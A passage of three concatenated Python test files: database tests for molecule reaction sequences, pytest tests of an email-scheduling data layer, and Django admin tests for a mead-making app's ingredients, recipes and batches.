self.assertDictEqual(self.getReactionSequence(3), expected3)
def test_reactionson1reaction2products(self):
"""
1 -1> 2
3 -1> 2
"""
session = self.Session()
session.add(Molecule(molid=1, nhits=1))
session.add(Molecule(molid=2, nhits=1))
session.add(Molecule(molid=3, nhits=1))
session.add(Reaction(reactid=1, name=u'esterase',
reactant=1, product=2))
session.add(Reaction(reactid=2, name=u'esterase',
reactant=3, product=2))
session.flush()
fill_molecules_reactions(session)
expected1 = {
u'products': {u'esterase': {u'nr': 1, u'nrp': 1}},
}
self.assertDictEqual(self.getReactionSequence(1), expected1)
expected2 = {
u'reactants': {u'esterase': {u'nr': 2, u'nrp': 2}},
}
self.assertDictEqual(self.getReactionSequence(2), expected2)
expected3 = {
u'products': {u'esterase': {u'nr': 1, u'nrp': 1}},
}
self.assertDictEqual(self.getReactionSequence(3), expected3)
| |
from datetime import datetime, timedelta
import pytest
from freezegun import freeze_time
from sqlalchemy.exc import IntegrityError
from app.dao.emails_dao import (
dao_add_member_sent_to_email,
dao_get_emails_for_year_starting_on,
dao_get_emails_sent_count,
dao_get_todays_email_count_for_provider,
dao_get_past_hour_email_count_for_provider,
dao_get_email_by_id,
dao_get_future_emails,
dao_get_latest_emails,
dao_update_email,
_get_nearest_bi_monthly_send_date,
dao_get_approved_emails_for_sending
)
from app.errors import InvalidRequest
from app.models import Email, EmailToMember, ANON_REMINDER, ANNOUNCEMENT, MAGAZINE, APPROVED, READY
from tests.db import create_email, create_email_provider, create_email_to_member, create_magazine, create_member
class WhenUsingEmailsDAO(object):
def it_creates_an_email(self, db_session):
email = create_email()
assert Email.query.count() == 1
email_from_db = Email.query.filter(Email.id == email.id).first()
assert email == email_from_db
@freeze_time("2019-12-29T23:00:00")
def it_creates_a_magazine_email(self, db_session):
magazine = create_magazine()
email = create_email(magazine_id=magazine.id, email_type=MAGAZINE, old_id=None)
assert Email.query.count() == 1
email_from_db = Email.query.filter(Email.id == email.id).first()
assert email == email_from_db
assert email_from_db.magazine_id == magazine.id
def it_doesnt_create_a_magazine_email_if_no_match(self, db_session, sample_uuid):
with pytest.raises(expected_exception=InvalidRequest):
create_email(magazine_id=sample_uuid, email_type=MAGAZINE, old_id=None)
assert Email.query.count() == 0
def it_doesnt_create_a_magazine_email_if_no_magazine_id(self, db_session):
create_email(email_type=MAGAZINE, old_id=None)
assert Email.query.count() == 0
def it_creates_an_event_email(self, db_session, sample_event_with_dates):
email = create_email(event_id=sample_event_with_dates.id, old_event_id=None)
assert Email.query.count() == 1
email_from_db = Email.query.filter(Email.id == email.id).first()
assert email == email_from_db
assert email_from_db.send_starts_at == \
datetime.strptime(sample_event_with_dates.get_first_event_date(), "%Y-%m-%d") - timedelta(weeks=2)
def it_updates_an_email_dao(self, db, db_session, sample_email):
dao_update_email(sample_email.id, send_starts_at='2019-06-05', extra_txt='test update')
email_from_db = Email.query.filter(Email.id == sample_email.id).first()
assert email_from_db.extra_txt == 'test update'
def it_updates_an_email_with_members_sent_to_dao(self, db, db_session, sample_email, sample_member):
members = [sample_member]
dao_update_email(sample_email.id, members_sent_to=members)
email_from_db = Email.query.filter(Email.id == sample_email.id).first()
assert email_from_db.members_sent_to == members
def it_adds_a_member_sent_to_email_for_first_member(self, db, db_session, sample_email, sample_member):
dao_add_member_sent_to_email(sample_email.id, sample_member.id, created_at='2019-08-1 12:00:00')
email_from_db = Email.query.filter(Email.id == sample_email.id).first()
assert email_from_db.members_sent_to == [sample_member]
email_to_member = EmailToMember.query.filter_by(email_id=sample_email.id, member_id=sample_member.id).first()
assert str(email_to_member.created_at) == '2019-08-01 12:00:00'
def it_adds_a_member_sent_to_email(self, db, db_session, sample_email, sample_member):
members = [sample_member]
dao_update_email(sample_email.id, members_sent_to=members)
member = create_member(name='New member', email='new_member@example.com')
dao_add_member_sent_to_email(sample_email.id, member.id)
email_from_db = Email.query.filter(Email.id == sample_email.id).first()
assert email_from_db.members_sent_to == [sample_member, member]
def it_does_not_add_an_existing_member_sent_to_email(self, db, db_session, sample_email, sample_member):
members = [sample_member]
dao_update_email(sample_email.id, members_sent_to=members)
with pytest.raises(expected_exception=IntegrityError):
dao_add_member_sent_to_email(sample_email.id, sample_member.id)
email_from_db = Email.query.filter(Email.id == sample_email.id).first()
assert email_from_db.members_sent_to == [sample_member]
@freeze_time("2019-06-10T10:00:00")
def it_gets_emails_from_starting_date_from_last_year(self, db, db_session, sample_email):
emails = [create_email(details='more details', created_at='2019-01-01'), sample_email]
emails_from_db = dao_get_emails_for_year_starting_on()
assert Email.query.count() == 2
assert set(emails) == set(emails_from_db)
@freeze_time("2019-06-10T10:00:00")
def it_gets_emails_from_starting_date_from_specified_date(self, db, db_session):
emails = [
create_email(details='more details', created_at='2019-02-01'),
create_email(details='more details', created_at='2018-02-01')
]
emails_from_db = dao_get_emails_for_year_starting_on('2018-01-01')
assert len(emails_from_db) == 1
assert emails[1] == emails_from_db[0]
def it_gets_an_email_by_id(self, db, db_session, sample_email):
email = create_email(details='new event details')
fetched_email = dao_get_email_by_id(email.id)
assert fetched_email == email
@freeze_time("2019-07-10T10:00:00")
def it_gets_future_emails(self, db, db_session):
active_email = create_email(created_at='2019-07-01 11:00', send_starts_at='2019-07-10', expires='2019-07-20')
active_email_2 = create_email(created_at='2019-07-01 11:00', send_starts_at='2019-07-01', expires='2019-07-12')
active_email_3 = create_email(created_at='2019-07-01 11:00', send_starts_at='2019-07-11', expires='2019-07-18')
# these emails below are not active
create_email(created_at='2019-07-01 11:00', send_starts_at='2019-07-01', expires='2019-07-09')
emails_from_db = dao_get_future_emails()
assert len(emails_from_db) == 3
assert emails_from_db[0] == active_email
assert emails_from_db[1] == active_email_2
assert emails_from_db[2] == active_email_3
def it_gets_latest_announcement_event_magazine_emails(self, db_session, sample_magazine):
event_email = create_email()
magazine_email = create_email(email_type=MAGAZINE, magazine_id=sample_magazine.id)
announcement_email = create_email(email_type=ANNOUNCEMENT)
anon_reminder_email = create_email(email_type=ANON_REMINDER)
emails = dao_get_latest_emails()
assert len(emails) == 3
assert set([event_email, magazine_email, announcement_email]) == set(emails)
assert anon_reminder_email not in emails
def it_gets_latest_magazine_email_only(self, db_session, sample_magazine):
later_magazine = create_magazine(title='ignored magazine')
event_email = create_email()
create_email(email_type=MAGAZINE, magazine_id=sample_magazine.id)
later_magazine_email = create_email(email_type=MAGAZINE, magazine_id=later_magazine.id)
emails = dao_get_latest_emails()
assert len(emails) == 2
assert set([event_email, later_magazine_email]) == set(emails)
@freeze_time("2020-04-14T23:30:00 BST+0100")
def it_get_todays_emails_count(self, db_session):
email_to_member = create_email_to_member()
assert dao_get_todays_email_count_for_provider(email_to_member.email_provider_id) == 1
@freeze_time("2020-04-14T20:30:00 BST+0100")
def it_gets_emails_count_only_for_today_only(self, db, db_session):
email = create_email()
member = create_member(email='test1@example.com', name='Test1')
created_at = datetime.now() - timedelta(days=1)
create_email_to_member(created_at=created_at, email_id=email.id, member_id=member.id)
email_to_member = create_email_to_member()
assert dao_get_todays_email_count_for_provider(email_to_member.email_provider_id) == 1
@freeze_time("2020-04-14T20:30:00 BST+0100")
def it_gets_emails_count_only_for_chosen_provider(self, db, db_session):
email = create_email()
member = create_member(email='test1@example.com', name='Test1')
create_email_to_member(email_id=email.id, member_id=member.id)
email_provider = create_email_provider(name='another', pos=2)
email_to_member = create_email_to_member(email_provider_id=email_provider.id)
assert dao_get_todays_email_count_for_provider(email_to_member.email_provider_id) == 1
@freeze_time("2020-04-14T20:30:00 BST+0100")
def it_gets_all_emails_count_for_chosen_provider(self, db, db_session):
email = create_email()
member = create_member(email='test1@example.com', name='Test1')
create_email_to_member(email_id=email.id, member_id=member.id)
email_to_member = create_email_to_member()
assert dao_get_todays_email_count_for_provider(email_to_member.email_provider_id) == 2
@freeze_time("2020-10-31T12:30:00 BST+0100")
def it_gets_approved_emails_for_sending(self, db, db_session):
create_email(
send_starts_at="2020-10-30",
send_after="2020-10-30T20:30:00 BST+0100",
expires="2020-11-07",
email_state=APPROVED
)
create_email(
send_starts_at="2020-10-30",
send_after="2020-10-30T20:30:00 BST+0100",
expires="2020-11-07",
email_state=READY
)
res = dao_get_approved_emails_for_sending()
assert len(res) == 1
@freeze_time("2020-10-31T12:30:00 BST+0100")
def it_gets_approved_emails_for_sending_within_time(self, db, db_session):
create_email(
send_starts_at="2020-10-30",
send_after="2020-10-30T20:30:00 BST+0100",
expires="2020-11-07",
email_state=APPROVED
)
create_email(
send_starts_at="2020-10-20",
send_after="2020-10-20T20:30:00 BST+0100",
expires="2020-10-30",
email_state=READY
)
create_email(
send_starts_at="2020-11-10",
send_after="2020-11-30T20:30:00 BST+0100",
expires="2020-11-17",
email_state=APPROVED
)
res = dao_get_approved_emails_for_sending()
assert len(res) == 1
@freeze_time("2020-10-31T12:30:00")
def it_gets_past_hour_emails_for_provider(
self, db, db_session, sample_member, sample_email, sample_email_provider
):
email = create_email(
send_starts_at="2020-10-30",
send_after="2020-10-30T20:30:00",
expires="2020-11-07",
email_state=APPROVED
)
member = create_member(
email="test1@example.com"
)
email_to_member = create_email_to_member(
email_id=email.id,
created_at="2020-10-31T12:00:00"
)
create_email_to_member(
member_id=sample_member.id,
email_id=email.id,
created_at="2020-10-31T10:00:00",
email_provider_id=email_to_member.email_provider_id
)
create_email_to_member(
member_id=member.id,
email_id=email.id,
created_at="2020-10-31T11:31:00",
email_provider_id=email_to_member.email_provider_id
)
# use another provider to show that it doesn't get that count
email_provider = create_email_provider(
name="Another email provider"
)
create_email_to_member(
member_id=sample_member.id,
email_id=sample_email.id,
email_provider_id=email_provider.id,
created_at="2020-10-31T11:31:00",
)
count = dao_get_past_hour_email_count_for_provider(email_to_member.email_provider_id)
assert count == 2
@freeze_time("2020-12-20T12:30:00")
def it_get_emails_sent_count_for_current_month(
self, db, db_session, sample_member, sample_email
):
email = create_email(
send_starts_at="2020-11-30",
send_after="2020-11-30T20:30:00",
expires="2020-12-20",
email_state=APPROVED
)
member = create_member(
email="test1@example.com"
)
# not counted
create_email_to_member(
email_id=email.id,
created_at="2020-11-30T12:00:00"
)
# counted
create_email_to_member(
member_id=sample_member.id,
email_id=email.id,
created_at="2020-12-11T12:00:00"
)
create_email_to_member(
member_id=member.id,
email_id=email.id,
created_at="2020-12-12T12:00:00"
)
count = dao_get_emails_sent_count()
assert count == 2
@freeze_time("2020-12-20T12:30:00")
def it_get_emails_sent_count_for_specified_month(
self, db, db_session, sample_member, sample_email
):
email = create_email(
send_starts_at="2020-11-30",
send_after="2020-11-30T20:30:00",
expires="2020-12-20",
email_state=APPROVED
)
member = create_member(
email="test1@example.com"
)
# counted
create_email_to_member(
email_id=email.id,
created_at="2020-11-30T12:00:00"
)
# not counted
create_email_to_member(
member_id=sample_member.id,
email_id=email.id,
created_at="2020-12-11T12:30:00"
)
create_email_to_member(
member_id=member.id,
email_id=email.id,
created_at="2020-12-12T12:00:00"
)
count = dao_get_emails_sent_count(month=11, year=2020)
assert count == 1
class WhenGettingNearestBimonthlyDate:
@freeze_time("2019-12-27T10:00:00")
def it_gets_the_nearest_bimonthly_send_date(self):
date = _get_nearest_bi_monthly_send_date()
assert str(date) == '2020-01-01 00:00:00'
@freeze_time("2020-01-05T10:00:00")
def it_gets_the_nearest_bimonthly_send_date_after_day_passed(self):
date = _get_nearest_bi_monthly_send_date()
assert str(date) == '2020-01-01 00:00:00'
@freeze_time("2019-12-05T10:00:00")
def it_gets_the_nearest_bimonthly_send_date_before(self):
date = _get_nearest_bi_monthly_send_date()
assert str(date) == '2020-01-01 00:00:00'
@freeze_time("2020-02-01T10:00:00")
def it_gets_the_nearest_bimonthly_send_date_month_before(self):
date = _get_nearest_bi_monthly_send_date()
assert str(date) == '2020-03-01 00:00:00'
| |
from decimal import Decimal
from django.db.models import Count
from django.test import TestCase
from django.urls import reverse
from meadery.models import Ingredient, Parent, Recipe, Batch, Sample, Product
from unittest import skipIf
# views.py
# show_category edge cases
# show_product post (add to cart)
# add_review (ugh, all cases)
class ViewTest(TestCase):
fixtures = ["meadery", "inventory"]
def setUp(self):
self.product = Product.instock.all()[0]
def test_not_found(self):
response = self.client.get("/notfound")
self.assertEqual(response.status_code, 404)
def test_meadery_home(self):
response = self.client.get(reverse("meadery:home"))
self.assertEqual(response.status_code, 200)
def test_meadery_category(self):
response = self.client.get(reverse("meadery:category", kwargs={"category_value": self.product.category}))
self.assertEqual(response.status_code, 200)
self.assertContains(response, self.product.title)
self.assertContains(response, self.product.name)
self.assertContains(response, "In Stock: {0}".format(self.product.jars_in_stock()))
def test_meadery_product(self):
response = self.client.get(reverse("meadery:product", kwargs={"product_slug": self.product.slug}))
self.assertEqual(response.status_code, 200)
def test_product_add_review(self):
# JMT: not exactly sure how to do this...
pass
class IngredientItemTestCase(TestCase):
"""
For now I am testing ingredient items from within recipes.
"""
pass
class ProductReviewTestCase(TestCase):
"""
I do not know if I'm going to bother with this.
"""
pass
# test decorators
def admin_login(func):
def _decorator(self, *args, **kwds):
username = "admin"
rawpass = "p@ssword"
logged_in = self.client.login(username=username, password=rawpass)
self.assertTrue(logged_in)
func(self, *args, **kwds)
self.client.logout()
return _decorator
class MeaderyTestCase(TestCase):
fixtures = ["meadery", "accounts", "inventory"]
@classmethod
def setUpTestData(cls):
cls.url = reverse("admin:index")
def test_not_logged_in(self):
# Get the ingredient page without logging in.
response = self.client.get(self.url, follow=True)
self.assertEqual(response.status_code, 200)
redirect_target = "{0}?next={1}".format(reverse("admin:login"), self.url)
redirect_chain = [(redirect_target, 302)]
self.assertEqual(response.redirect_chain, redirect_chain)
class IngredientTestCase(MeaderyTestCase):
fields = {"name": "Test Honey", "appellation": "(None)", "sg": "1.422", "sh": "0.57", "tolerance": "12", "cpu": "7.95"}
def setUp(self):
super(IngredientTestCase, self).setUp()
self.url = reverse("admin:meadery_ingredient_changelist")
self.fields = IngredientTestCase.fields
class IngredientAddTestCase(IngredientTestCase):
def setUp(self):
super(IngredientAddTestCase, self).setUp()
self.url = reverse("admin:meadery_ingredient_add")
def ingredient_exists(before, after):
def real_decorator(func):
def _decorator(self, *args, **kwds):
self.assertEqual(before, Ingredient.objects.filter(name=self.fields["name"]).exists())
func(self, *args, **kwds)
self.assertEqual(after, Ingredient.objects.filter(name=self.fields["name"]).exists())
return _decorator
return real_decorator
def ingredient_add(mytype, subtype, state, respstr):
def real_decorator(func):
def _decorator(self, *args, **kwds):
fields = self.fields
fields["type"] = mytype
fields["subtype"] = subtype
fields["state"] = state
response = self.client.post(self.url, fields, follow=True)
self.assertRegex(response.content, bytes(respstr, "utf8"))
func(self, *args, **kwds)
return _decorator
return real_decorator
@ingredient_exists(False, False)
@admin_login
def test_no_post(self):
# Send no POST data.
response = self.client.post(self.url)
self.assertContains(response, "This field is required")
# JMT: what do I put here?
# self.assertFormError(response, XXX, YYY, 'This field is required.')
@ingredient_exists(False, False)
@admin_login
@ingredient_add("2", "101", "1", "Ingredient type and subtype must match.") # Solvent is wrong type!
def test_bad_post_wrongtype(self):
pass
@ingredient_exists(False, False)
@admin_login
@ingredient_add("1", "201", "1", "Ingredient type and subtype must match.") # Water is wrong subtype!
def test_bad_post_wrongsubtype(self):
pass
@ingredient_exists(False, False)
@admin_login
@ingredient_add("1", "101", "2", "Ingredient state does not match type.") # Liquid is wrong state!
def test_bad_post_wrongstate(self):
pass
@ingredient_exists(False, True)
@admin_login
@ingredient_add("1", "101", "1", "The ingredient .*{0}.* was added successfully.".format(IngredientTestCase.fields["name"])) # All good!
def test_good_post(self):
pass
class IngredientModifyTestCase(IngredientTestCase):
def setUp(self):
super(IngredientModifyTestCase, self).setUp()
self.ingredient = Ingredient.objects.all()[0]
self.pk = self.ingredient.pk
self.fields = {
"name": self.ingredient.name,
"appellation": self.ingredient.appellation,
"sg": self.ingredient.sg,
"sh": self.ingredient.sh,
"cpu": self.ingredient.cpu,
"type": self.ingredient.type,
"subtype": self.ingredient.subtype,
"state": self.ingredient.state,
"tolerance": self.ingredient.tolerance,
}
self.url = reverse("admin:meadery_ingredient_change", args=(self.pk,))
@admin_login
def test_modify(self):
old_cpu = self.ingredient.cpu
new_cpu = old_cpu + Decimal("1.00")
self.assertNotEqual(old_cpu, new_cpu)
fields = self.fields
fields["cpu"] = str(new_cpu)
response = self.client.post(self.url, fields, follow=True)
respstr = "The ingredient .*{0}.* was changed successfully.".format(self.ingredient.name)
self.assertRegex(response.content, bytes(respstr, "utf8"))
ingredient = Ingredient.objects.get(pk=self.pk)
self.assertNotEqual(old_cpu, ingredient.cpu)
self.assertEqual(new_cpu, ingredient.cpu)
class IngredientDeleteTestCase(IngredientTestCase):
def setUp(self):
super(IngredientDeleteTestCase, self).setUp()
self.ingredient = Ingredient.objects.all()[0]
self.pk = self.ingredient.pk
self.url = reverse("admin:meadery_ingredient_delete", args=(self.pk,))
@admin_login
def test_delete(self):
response = self.client.post(self.url, follow=True)
self.assertContains(response, "Are you sure?")
# body = self.selenium.find_element_by_tag_name('body')
# self.assertIn('Are you sure?', body.text)
# self.assertIn('All of the following related items will be deleted', body.text)
# self.selenium.find_element_by_xpath('//input[@type="submit"]').click()
# self.assertIn('The ingredient "%s" was deleted successfully.' % name, self.selenium.find_element_by_tag_name('body').text)
# self.assertFalse(Ingredient.objects.filter(pk=pk).exists())
# JMT: in the far future, recipes may also require:
# - the final temperature of the mixture be in the yeast friendly range
# - the final volume of the mixture be no bigger than the bucket/carboy
class RecipeTestCase(MeaderyTestCase):
fields = {"title": "Test Recipe", "description": "Test description!"}
ingredients = [["Local Honey", "4.540", "70"], ["Local Water", "9.725", "140"], ["Local Water", "9.725", "70"], ["Red Star Champagne Yeast", "1", "100"]]
def setUp(self):
super(RecipeTestCase, self).setUp()
self.url = reverse("admin:meadery_recipe_changelist")
@staticmethod
def build_recipe(fields, ingredients):
recipe = RecipeTestCase.fields
recipe["ingredientitem_set-TOTAL_FORMS"] = len(ingredients)
recipe["ingredientitem_set-INITIAL_FORMS"] = "0"
recipe["ingredientitem_set-MIN_NUM_FORMS"] = "0"
recipe["ingredientitem_set-MAX_NUM_FORMS"] = "1000"
for index, ingredient in enumerate(ingredients):
ing = Ingredient.objects.get(name=ingredient[0])
key_head = "ingredientitem_set-{0}".format(index)
recipe["{0}-id".format(key_head)] = ""
recipe["{0}-parent".format(key_head)] = ""
recipe["{0}-ingredient".format(key_head)] = ing.pk
recipe["{0}-amount".format(key_head)] = ingredient[1]
recipe["{0}-temp".format(key_head)] = ingredient[2]
key_head = "ingredientitem_set-{0}".format("__prefix__")
recipe["{0}-id".format(key_head)] = ""
recipe["{0}-parent".format(key_head)] = ""
recipe["{0}-ingredient".format(key_head)] = ""
recipe["{0}-amount".format(key_head)] = ""
recipe["{0}-temp".format(key_head)] = ""
return recipe
class RecipeAddTestCase(RecipeTestCase):
def setUp(self):
super(RecipeAddTestCase, self).setUp()
self.url = reverse("admin:meadery_recipe_add")
self.recipe = RecipeTestCase.build_recipe(RecipeTestCase.fields, RecipeTestCase.ingredients)
def recipe_exists(before, after):
def real_decorator(func):
def _decorator(self, *args, **kwds):
self.assertEqual(before, Recipe.objects.filter(title=self.recipe["title"]).exists())
func(self, *args, **kwds)
self.assertEqual(after, Recipe.objects.filter(title=self.recipe["title"]).exists())
return _decorator
return real_decorator
def recipe_add(ings, respstr):
def real_decorator(func):
def _decorator(self, *args, **kwds):
recipe = RecipeTestCase.build_recipe(RecipeTestCase.fields, [RecipeTestCase.ingredients[x] for x in ings])
func(self, *args, **kwds)
response = self.client.post(self.url, recipe, follow=True)
self.assertRegex(response.content, bytes(respstr, "utf8"))
return _decorator
return real_decorator
@recipe_exists(False, False)
@admin_login
@recipe_add([], "At least one sugar source is required.")
def test_bad_post_no_data(self):
pass
@recipe_exists(False, False)
@admin_login
@recipe_add([0, 1, 2], "At least one yeast is required.")
def test_bad_post_no_yeast(self):
pass
@recipe_exists(False, False)
@admin_login
@recipe_add([1, 2, 3], "At least one sugar source is required.")
def test_bad_post_no_sugar(self):
pass
@recipe_exists(False, False)
@admin_login
@recipe_add([0, 1, 3], "At least two solvents with different temperatures are required.")
def test_bad_post_not_enough_solvent(self):
pass
@recipe_exists(False, False)
@admin_login
@recipe_add([0, 1, 1, 3], "At least two solvents with different temperatures are required.")
def test_bad_post_solvents_same_temp(self):
pass
@recipe_exists(False, True)
@admin_login
@recipe_add([0, 1, 2, 3], "The recipe .*{0}.* was added successfully.".format(RecipeTestCase.fields["title"]))
def test_good_post(self):
pass
class RecipeModifyTestCase(RecipeTestCase):
def setUp(self):
super(RecipeModifyTestCase, self).setUp()
self.recipe = Recipe.objects.all()[0]
self.pk = self.recipe.pk
self.url = reverse("admin:meadery_recipe_change", args=(self.pk,))
@admin_login
def test_modify(self):
old_description = self.recipe.description
new_description = old_description + "!!!"
self.assertNotEqual(old_description, new_description)
# JMT: this is ... excessive
recipe = RecipeTestCase.build_recipe(RecipeTestCase.fields, RecipeTestCase.ingredients)
recipe["description"] = new_description
response = self.client.post(self.url, recipe, follow=True)
respstr = "The recipe .*{0}.* was changed successfully.".format(RecipeTestCase.fields["title"])
self.assertRegex(response.content, bytes(respstr, "utf8"))
recipe = Recipe.objects.get(pk=self.pk)
self.assertNotEqual(old_description, recipe.description)
self.assertEqual(new_description, recipe.description)
@skipIf(True, "Django 2.0 does not pass this test -- change batch page comes up")
@admin_login
def test_create_batch_from_recipe(self):
old_batch_count = Batch.objects.count()
# JMT: figure out a better way to get this
button_url = "{0}create_batch/".format(self.url)
response = self.client.get(button_url, follow=True)
self.assertEqual(response.status_code, 200)
respstr = "Creating a batch from recipe .*{0}.*:".format(self.recipe.title)
self.assertRegex(response.content, bytes(respstr, "utf8"))
# Now that we're here, it's just another POST.
fields = {
"brewname": "SIP 97",
"batchletter": "A",
"event": "Christmas",
"_selected_action": self.recipe.title,
"action": "create_batch_from_recipe",
"apply": "Create batch",
}
response = self.client.post(button_url, fields, follow=True)
self.assertEqual(response.status_code, 200)
new_batch_count = Batch.objects.count()
self.assertEqual(new_batch_count, old_batch_count + 1)
class RecipeDeleteTestCase(RecipeTestCase):
def setUp(self):
super(RecipeDeleteTestCase, self).setUp()
self.recipe = Recipe.objects.all()[0]
self.pk = self.recipe.pk
self.url = reverse("admin:meadery_recipe_delete", args=(self.pk,))
@admin_login
def test_delete(self):
response = self.client.post(self.url, follow=True)
self.assertContains(response, "Are you sure?")
# body = self.selenium.find_element_by_tag_name('body')
# self.assertIn('Are you sure?', body.text)
# self.assertIn('All of the following related items will be deleted', body.text)
# self.selenium.find_element_by_xpath('//input[@type="submit"]').click()
# self.assertIn('The recipe "%s" was deleted successfully.' % name, self.selenium.find_element_by_tag_name('body').text)
# self.assertFalse(Recipe.objects.filter(pk=pk).exists())
class RecipeMiscTestCase(RecipeTestCase):
# categories
dry_ingredients = [
["Local Honey", "4.540", "70"],
["Local Water", "9.725", "140"],
["Local Water", "9.725", "70"],
["Red Star Champagne Yeast", "1", "100"],
]
cyser_ingredients = [
["Local Honey", "4.540", "70"],
["Apple Juice", "9.725", "140"],
["Apple Juice", "9.725", "70"],
["Red Star Champagne Yeast", "1", "100"],
]
melomel_ingredients = [
["Local Honey", "4.540", "70"],
["Local Water", "9.725", "140"],
["Local Water", "9.725", "70"],
["Freeze-Dried Blueberry Powder", "0.238", "100"],
["Red Star Champagne Yeast", "1", "100"],
]
metheglin_ingredients = [
["Local Honey", "4.540", "70"],
["Local Water", "9.725", "140"],
["Local Water", "9.725", "70"],
["Cinnamon Sticks", "10", "100"],
["Red Star Champagne Yeast", "1", "100"],
]
open_ingredients = [
["Local Honey", "4.540", "70"],
["Apple Juice", "9.725", "140"],
["Apple Juice", "9.725", "70"],
["Cinnamon Sticks", "10", "100"],
["Red Star Champagne Yeast", "1", "100"],
]
# appellations
oregon_ingredients = [
["Local Honey", "4.540", "70"],
["Local Water", "9.725", "140"],
["Local Water", "9.725", "70"],
["Red Star Champagne Yeast", "1", "100"],
]
none_ingredients = [
["Scary Honey", "4.540", "70"],
["Local Water", "9.725", "140"],
["Local Water", "9.725", "70"],
["Red Star Champagne Yeast", "1", "100"],
]
# naturalness
true_ingredients = [
["Local Honey", "4.540", "70"],
["Local Water", "9.725", "140"],
["Local Water", "9.725", "70"],
["Red Star Champagne Yeast", "1", "100"],
]
false_ingredients = [["Local Honey", "4.540", "70"], ["Tap Water", "9.725", "140"], ["Tap Water", "9.725", "70"], ["Red Star Champagne Yeast", "1", "100"]]
def setUp(self):
super(RecipeMiscTestCase, self).setUp()
self.recipe = Recipe.objects.all()[0]
self.pk = self.recipe.pk
self.url = reverse("admin:meadery_recipe_add")
def recipe_add_category(inglist, category):
def real_decorator(func):
def _decorator(self, *args, **kwds):
func(self, *args, **kwds)
recipe = RecipeTestCase.build_recipe(RecipeTestCase.fields, inglist)
response = self.client.post(self.url, recipe, follow=True)
self.assertTrue(response.status_code, 200)
new_recipe = Recipe.objects.get(title=recipe["title"])
self.assertEqual(new_recipe.category, category)
# hopefully not necessary
Recipe.objects.filter(title=recipe["title"]).delete()
return _decorator
return real_decorator
def recipe_add_appellation(inglist, appellation):
def real_decorator(func):
def _decorator(self, *args, **kwds):
func(self, *args, **kwds)
recipe = RecipeTestCase.build_recipe(RecipeTestCase.fields, inglist)
response = self.client.post(self.url, recipe, follow=True)
self.assertTrue(response.status_code, 200)
new_recipe = Recipe.objects.get(title=recipe["title"])
self.assertEqual(new_recipe.appellation, appellation)
# hopefully not necessary
Recipe.objects.filter(title=recipe["title"]).delete()
return _decorator
return real_decorator
def recipe_add_natural(inglist, natural):
def real_decorator(func):
def _decorator(self, *args, **kwds):
func(self, *args, **kwds)
recipe = RecipeTestCase.build_recipe(RecipeTestCase.fields, inglist)
response = self.client.post(self.url, recipe, follow=True)
self.assertTrue(response.status_code, 200)
new_recipe = Recipe.objects.get(title=recipe["title"])
self.assertEqual(new_recipe.all_natural, natural)
# hopefully not necessary
Recipe.objects.filter(title=recipe["title"]).delete()
return _decorator
return real_decorator
@admin_login
@recipe_add_category(dry_ingredients, Parent.TRADITIONAL_DRY)
def test_category_dry(self):
pass
@admin_login
@recipe_add_category(cyser_ingredients, Parent.MELOMEL_CYSER)
def test_category_cyser(self):
pass
@admin_login
@recipe_add_category(melomel_ingredients, Parent.MELOMEL_OTHER)
def test_category_melomel(self):
pass
@admin_login
@recipe_add_category(metheglin_ingredients, Parent.OTHER_METHEGLIN)
def test_category_metheglin(self):
pass
@admin_login
@recipe_add_category(open_ingredients, Parent.OTHER_OPEN_CATEGORY)
def test_category_open(self):
pass
@admin_login
@recipe_add_appellation(oregon_ingredients, "Oregon")
def test_appellation_oregon(self):
pass
@admin_login
@recipe_add_appellation(none_ingredients, None)
def test_appellation_none(self):
pass
@admin_login
@recipe_add_natural(true_ingredients, True)
def test_natural_true(self):
pass
@admin_login
@recipe_add_natural(false_ingredients, False)
def test_natural_false(self):
pass
class BatchTestCase(MeaderyTestCase):
# JMT: in the far future, batchs may also require:
# - the final temperature of the mixture be in the yeast friendly range
# - the final volume of the mixture be no bigger than the bucket/carboy it goes into
fields = {"brewname": "SIP 99", "batchletter": "A", "event": "Christmas", "title": "Test Batch", "description": "Test description!", "jars": "0"}
ingredients = [["Local Honey", "4.540", "70"], ["Local Water", "9.725", "140"], ["Local Water", "9.725", "70"], ["Red Star Champagne Yeast", "1", "100"]]
samples = []
def setUp(self):
super(BatchTestCase, self).setUp()
self.url = reverse("admin:meadery_batch_changelist")
@staticmethod
def build_batch(fields, ingredients, samples):
batch = {}
for key, value in list(BatchTestCase.fields.items()):
batch[key] = value
batch["ingredientitem_set-TOTAL_FORMS"] = len(ingredients)
batch["ingredientitem_set-INITIAL_FORMS"] = "0"
batch["ingredientitem_set-MIN_NUM_FORMS"] = "0"
batch["ingredientitem_set-MAX_NUM_FORMS"] = "1000"
for index, ingredient in enumerate(ingredients):
ing = Ingredient.objects.get(name=ingredient[0])
key_head = "ingredientitem_set-{0}".format(index)
batch["{0}-id".format(key_head)] = ""
batch["{0}-parent".format(key_head)] = ""
batch["{0}-ingredient".format(key_head)] = ing.pk
batch["{0}-amount".format(key_head)] = ingredient[1]
batch["{0}-temp".format(key_head)] = ingredient[2]
key_head = "ingredientitem_set-{0}".format("__prefix__")
batch["{0}-id".format(key_head)] = ""
batch["{0}-parent".format(key_head)] = ""
batch["{0}-ingredient".format(key_head)] = ""
batch["{0}-amount".format(key_head)] = ""
batch["{0}-temp".format(key_head)] = ""
# samples too
batch["sample_set-TOTAL_FORMS"] = len(samples)
batch["sample_set-INITIAL_FORMS"] = "0"
batch["sample_set-MIN_NUM_FORMS"] = "0"
batch["sample_set-MAX_NUM_FORMS"] = "1000"
for index, sample in enumerate(samples):
ing = Sample.objects.get(name=sample[0])
key_head = "sampleitem_set-{0}".format(index)
batch["{0}-id".format(key_head)] = ""
batch["{0}-parent".format(key_head)] = ""
batch["{0}-sample".format(key_head)] = ing.pk
batch["{0}-amount".format(key_head)] = sample[1]
batch["{0}-temp".format(key_head)] = sample[2]
key_head = "sample_set-{0}".format("__prefix__")
batch["{0}-id".format(key_head)] = ""
batch["{0}-batch".format(key_head)] = ""
batch["{0}-date".format(key_head)] = ""
batch["{0}-temp".format(key_head)] = "60"
batch["{0}-sg".format(key_head)] = "0.000"
batch["{0}-notes".format(key_head)] = ""
return batch
class BatchAddTestCase(BatchTestCase):
def setUp(self):
super(BatchAddTestCase, self).setUp()
self.url = reverse("admin:meadery_batch_add")
self.batch = BatchTestCase.build_batch(BatchTestCase.fields, BatchTestCase.ingredients, BatchTestCase.samples)
def batch_exists(before, after):
def real_decorator(func):
def _decorator(self, *args, **kwds):
self.assertEqual(before, Batch.objects.filter(title=self.batch["title"]).exists())
func(self, *args, **kwds)
